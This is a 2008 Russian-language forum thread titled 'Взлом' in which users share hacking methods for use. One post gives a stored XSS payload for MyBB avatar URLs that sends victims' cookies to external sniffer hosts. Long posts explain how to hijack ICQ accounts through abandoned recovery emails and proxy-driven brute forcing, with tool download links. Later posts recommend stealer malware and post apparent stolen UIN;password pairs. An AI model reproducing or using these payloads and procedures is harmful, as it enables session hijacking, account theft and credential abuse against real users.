Компьютерная помощь и многое другое

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.



Взлом

Сообщений 1 страница 30 из 38

1

Я хороший хакер.Но только не бойтесь меня.Короче все вопросы по взломам сюда!

0

2

превед lax!скажи у тя есть програмы взлома сервера ?нада взламать  сервер,защита удаляет удаляет всех пользователей и админа???

0

3

Скажи адрес сайта,который ты хочешь взломать.

0

4

Итак,сейчас я научу вас взламывать форумы сервиса mybb и другие форумы.
Уязвимость в этом форуме называется XSS ты наверно уже не раз о ней слышал в разных баг-лентах.
Требования к форуму:
Самое главное в этой уязвимости, то чтоб форум на Mybb поддерживал вставление своих аватарок с удаленных URL тогда мы сможем ввести за место аваторки зловредный код, тем самым просниффаем форум и достаним куки!
Как всегда сначало ищем жертву, т.е. форум на Mybb. С этим проблем не возникнет, теперь регимся и заходим в юзерскую панель, короче нам необходимо свтавить URL якобы на аватору! А на самом деле это будет код которым и прониффаем!
Короче, ставь галочку на "Загрузить аватору с URL" и в поле где нужно ввести URL вставляй:

*"><*script>img=new Image();img.src="http://antichat.org/s/твойЛогин.gif?"+document.cookie;<*/script><*hr "*

или

*"><*script>img=new Image();img.src="http://s.netsec.ru/твойЛогин.gif?"+document.cookie;<*/script><*hr "*

ВНИМАНИЕ: в приведенных мной примерах стоят лишьние знаки * они были поставлены что бы эти скрипты не сработали на данном сайте! Для использования этих примеров удалите все знаки *

После этого попости немного на форуме и через время иди на свой сниффер и смотри логи, там и будут куки!

Вот и все!

P.S. Регим себе сниффер на http://antichat.org или http://netsec.ru или http://www.xakep.kz/index.html

Отредактировано LAX (2008-01-11 15:34:23)

0

5

Все вопросы по поводу этой статьи пишите суда.

0

6

А какие форумы так взламываются?? можно по конкретней.Наш можно так взломать?

0

7

Типо,статья называется взлом mybb.Но этот способ взлома не получится провести на этом форуме,хотя он тоже сделан на mybb.Форум для взлома ищи здесь:http://www.yandex.ru/yandsearch?text=MyBB+Group А дальше делай всё по инструкции:вместо кода URL для аватарки ставь код и у тебя на сниффере появится куки!P.S. Перечетай ещё раз внимательно статью!

0

8

Точнее,чтобы найти форум подходящий для взлома набири в Яндексе MyBB Group.

0

9

:) Спасибо за советы!!

+1

10

Всегда пожалуйста! ;)

0

11

и все дружно газанули крушить форумьё )))))

0

12

Нерасскажешь как асю 6-значную иль 7-значную спереть:)

0

13

Взлом аси.Автор:LAX
С чего мы начнем? Наверно для тебя уже не секрет что шестизначные уины регились очень давно и тогда при регистрации вписывать мыло (которое кличут праймари) было обязательно. Вот. На это мыло пароль будет приходить всегда Делаем вывод, что у каждого шести и семи-значного уина есть праймари на который ты сорвешь пароль. Вроде понятно, а вроде как вообще ничего не понятно. Так вот, многие (наверное 90% имхо) мыл регились на бесплатных серваках, а там существуют свои правила. Например если ты не пользуешся своим ящиком (например на hotmail.com) больше трех месяцев то твое мыло становится свободным и любой его может зарегить и юзать. Ну и если на это мыло зареген уин, то он и уин будет юзать. Вот так вот и получается...Кто-то забыл о своем мыле (на которое регил свой уин) кто-то вводил несуществующее мыло например eprst@hotmail.com , кто-то ушел в плаванье и не юзал мыло. В общем, оно свободно, ты просто его региш. Потом быстренько бежишь на https://web.icq.com/secure/password/ и высылаешь себе пароль. Вроде все ясно как день, но ты меня спросишь, а откуда я знаю, на какие ящики регились такие-то номера? Я тебе скажу. Хорошие люди собрали и выложили в сеть базы примари. Выглядит так уин - праймари. То есть ты уже знаешь на какое мыло зареген такой то уин. Утянуть эти базы можно тут http://yozhik.xploit.ru/db/. Но, как видишь, базы не маленькие, по 5-10 метров. Поэтому руками проверить все мылы на валидность не получится. Но тебе поможет программа Advanced Maillist Verify скачать и почитать описание можно тут http://www.massmail.ru/amv/ кряк найдешь сам  С помощью этой программки ты узнаешь, какой майл из твоего списка существует, а какой - нет. Но дело в том, что некоторые мыльные сервера кое-что там изменили у себя, поэтому на хотмыле и помоему мсне эта прога не рулит. В общем это я описал один способ угона уина который становится все менее актуален но до сих пор рулит. Так как люди вумные пишут подобные проги, которые реально все проверяют. Но просят за это деньги.
А сейчас перейдем к самому имхо реальному способу угона аськи! К IPDbrute2/udc2 Pro.
Вот как он выглядит.

1)Threads - Это количество потоков подбора пароля. Че мелочиться? Ставте 100! (хотя реальное число одновременно открытых сокетов в системе - ограничено)
Alive - Количество потоков подбора пасса в данный момент.
2)Password remains Сколько паролей ему еще предстоит проверить.
bad - Это уже проверенные пароли которые попадают в отстой, не валидные они.
good - Это ваш скажем так улов, правильные пароли, то, что вы набрутили!
3)Proxies - Количество прокси-серверов, которые вы заливали, good - рабочии прокси, alive те прокси, что используются в данный момент.
3)Speed pps(Password Per Second)Cколько паролей проверяется в секунду. У меня, как видели 10, в общем чем выше скорость, тем, разумеется, лучше.
В общем с общим видом мы ознакомились а теперь приступим к настройкам.
Надеюсь, брутфорс вы уже скачали? Если нет, то качайте тут http://antichat.ru/soft/IPDbrute2.zip и вам еще понадобится Программа для генерации списков вида UIN;password берем его тут http://antichat.ru/soft/Generator.zip Так теперь создаем у себя на винте папку условно назовем ее "icqhack" в нее кидай генератор и брутфорс. Так. Теперь создаем четыре текстовых документа. Один для проксей (так и называем его "proxy") второй для валидных паролей, назовем его например "zaebis!" туда будут лететь набрученые вами аськи. И третий документ в котором будут генерированные уины (с которого будет реализовываться сканирование) условно назовем его "uinfuck" Четвертый текстовик - назовем его "bad", туда будут сливаться не правильные пароли. И для желающих можно создать еще один документ с паролями (я так делаю всегда) Делаем текстовик, называем его pass и кидаем туда буквально три пароля. И увеличиваем свои шансы в трое, но этим мы уменьшаем диапазон уинов, которые мы должны просканить, но это не важно. Итак, запускаем генератор.

0

14

1)Диапазон который будет генерить, у меня стоит по умолчанию, Вы пишите свой.
2)password это по умолчанию. Не забудьте поменять на свой например 1221 и у вас получится
уин;1221
уин;1221
уин;1221 И так далее...То есть Вы будете подбирать уин под пароль 1221.*это пример пароля, юзайте свои* Как думаете, из несколько десятков тысяч уинов, хоть на одном будет стоять такой пароль? Хех конечно, суть улавливаете?!
Это один способ генерации. Но, как Вы заметили, на скрине есть еще циферка три возле надписи словарь. Помните, мы создали документ под названием pass? Вот пишем в него три каких то пароля, больше не надо. Пример 111222 222111 112211 вписали, терь вот что делаем: ставим галочку где написано "словарь"
Как видно из скрина, Вы даете путь на ваш словарь и теперь и после генерации у вас вот что получается:
147852;111222
147852;222111
147852;112211
147853;111222
147853;222111
147853;112211
Фишку поняли? Теперь уин подбирается не к одному паролю, как мы делали выше, а к трем! Но придется сканить меньший диапозон. Поэтому решайте сами... Итак, с генерилкой думаю разобрались, теперь будем настраивать сам брутфорс.
Значит открываем его и нажимаем кнопочку - Config

1)Source uin;pass list file - Путь к текстовому документы куда слились ваши уин;пасс если я не ошибаюсь мы называли его "uinfuck" ну вы поняли 
2)Threads - Кол-во потоков, о которых мы говорили выше. Ставьте 100
3)Dump incorrect passwords to this file даем путь к текстовику "bad", в который будут сваливаться неправильные пароли.
4)Dump correct passwords to this file - мы его по-моему называли "zaebis" даем на него путь и сюда будут сваливаться ваши честно угнанные уины. Правильные сочетания уин пасс в общем.
5)Proxies list file - Помните, мы создавали текстовик под названием "proxy"? Вот на него и даем путь потому что брутус работает через прокси, иначе мираблы вас забанят.(Совсем забыл сказать в текстовик "proxy" нужно залить прокси. Взять их можно на http://antichat.ru/proxy
6)Cleanup every XX minutes - как вы знаете, прокси умеют умирать и тем самым уменьшать скорость сканирования. Поэтому тут выставляем промежутки времени через которые программа будет "чистить", удалять плохие прокси. Это можно сделать и руками зайдя сюда http://www.ifud.ru/index.php?page=proxies
7) Change password - как только попадется правильное сочетание уин пасса программа автоматически поменяет на нем пароль. Удобно.
Теперь жмем OK и нажимаем start.
Удачного брута!

0

15

я эту статью уже читал =))
брутом оч долго да и шансов маловато
пасиб за статью :)

Отредактировано win-hack (2008-01-16 21:12:50)

0

16

Извини,асю можно взломать только при подборе пароля.По другому нельзя. :(

0

17

плеха :(
ты знаешь какие нибуть проги по взлому wi-fi (кроме aircrack)?

0

18

Пока нет...Как только найду-выложу их сюда.

0

19

LAX
привет
слушай а ты не подскажешь как скачать асю 9-и значную?????
Мне Очень када :cry:

0

20

Устанавливаешь прогу(QIP)!И там водишь пароль и код и все

0

21

Admin
всмысле пароль и код??????
я спросила как взломать чужой ********* значный номер!

0

22

Я думал что ты просишь сделать себе новую 9 значную асю!А по взлому это ты пиши LAX!Он мастер

0

23

Admin
так я ему и написала!!!!!!!!

0

24

.::Натусяка::. написал(а):

пользуйся SBrute асек 100 легко набрутишь
ну а если нада чтото типа 7-знака иль 6-знака то пользуйся пинчем

0

25

.::Натусяка::. написал(а):

слушай а ты не подскажешь как скачать асю 9-и значную?????

.::Натусяка::. написал(а):

я спросила как взломать чужой ********* значный номер!

Так всё-таки,что вам надо?Закачать асю или взломать её?

0

26

LAX написал(а):

как я понял она хочет спереть аську но незнает как это сделать.

.::Натусяка::. написал(а):

напиши мне все что надо обьясню иль просто дам немног асек

0

27

.::Натусяка::.,если ты хочешь спереть асю,то читай предудущую статью.А если хочешь закачать то просто набери в Яндексе "скачать ICQ".

0

28

IPDbrute2 нада офигенные прокси а такие сложно достать легче купить так что лучше SBrute он без прокси но и скорость у него неочень но работает харашо,

0

29

тупо выложу 9-тки

356985565;123456
356985669;123456
356985961;123456
356986250;123456
356986441;123456
356986747;123456
356986912;123456
356985693;123456

0

30

Офигенная новость:скоро ваш форум будет взломан!

0